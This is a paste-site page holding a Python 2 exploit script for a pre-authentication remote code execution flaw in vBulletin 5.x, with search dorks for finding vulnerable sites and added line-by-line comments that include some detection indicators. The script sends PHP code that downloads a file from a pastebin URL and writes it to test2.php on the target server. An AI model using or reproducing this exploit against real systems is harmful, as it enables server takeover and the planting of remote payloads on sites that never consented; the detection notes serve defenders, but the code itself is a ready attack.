
s4e

a guest Sep 27th, 2019 51 Never
  1. #!/usr/bin/python
  2. #
  3. # vBulletin 5.x 0day pre-auth RCE exploit
  4. #
  5. # This should work on all versions from 5.0.0 till 5.5.4
  6. #
  7. # Google Dorks:
  8. # - site:*.vbulletin.net
  9. # - "Powered by vBulletin Version 5.5.4"
  10.  
  11. import requests
  12. import sys
  13.  
  # Flat Python 2 script (raw_input, print statement, "except Exception, e").
  # It takes exactly one argument, the URL of the vBulletin site, and exits
  # with a usage line otherwise.
  14. if len(sys.argv) != 2:
  15.     sys.exit("Usage: %s <URL to vBulletin>" % sys.argv[0])
  16.  
  # Every request carries routestring=ajax/render/widget_php. Detection note:
  # a POST whose body has this routestring value together with a
  # widgetConfig[code] field (set below) is the request shape to search for
  # in web-server and WAF logs.
  17. params = {"routestring":"ajax/render/widget_php"}
  18.  
  # Prompt loop: one POST per line of input, until Ctrl-C or the first error.
  19. while True:
  20.      try:
                # cmd is read but never referenced again; the payload sent
                # below is the same fixed string whatever is typed here.
  21.           cmd = raw_input("vBulletin$ ")
                # Hard-coded remote paste used as the content source.
  22.           s4e = "https://pastebin.com/raw/nCNNLLb7"
                # The code field is a PHP snippet that fetches the paste and
                # writes it to test2.php, then echoes file_put_contents()'s
                # return value. The path is relative, so where the file lands
                # depends on the PHP process's working directory.
                # Host-side indicators: a newly created test2.php and an
                # outbound request from the web server to pastebin.com.
                # The fetch relies on PHP being allowed to open URLs
                # (allow_url_fopen).
  23.           params["widgetConfig[code]"] = "echo file_put_contents('test2.php',file_get_contents('"+s4e+"')); exit;"
                # Form-encoded POST to the URL from argv[1]; no timeout is
                # passed, so an unresponsive host blocks the loop.
  24.           r = requests.post(url = sys.argv[1], data = params)
                # Only the HTTP status is checked: a 200 prints the body as-is,
                # with no check that the write actually happened.
  25.           if r.status_code == 200:
  26.                print r.text
  27.           else:
                     # Any non-200 response terminates the script.
  28.                sys.exit("Exploit failed! :(")
  29.      except KeyboardInterrupt:
  30.           sys.exit("\nClosing shell...")
           # Any other exception (connection error, bad URL, ...) also ends
           # the script, with the exception text as the exit message.
  31.      except Exception, e:
  32.           sys.exit(str(e))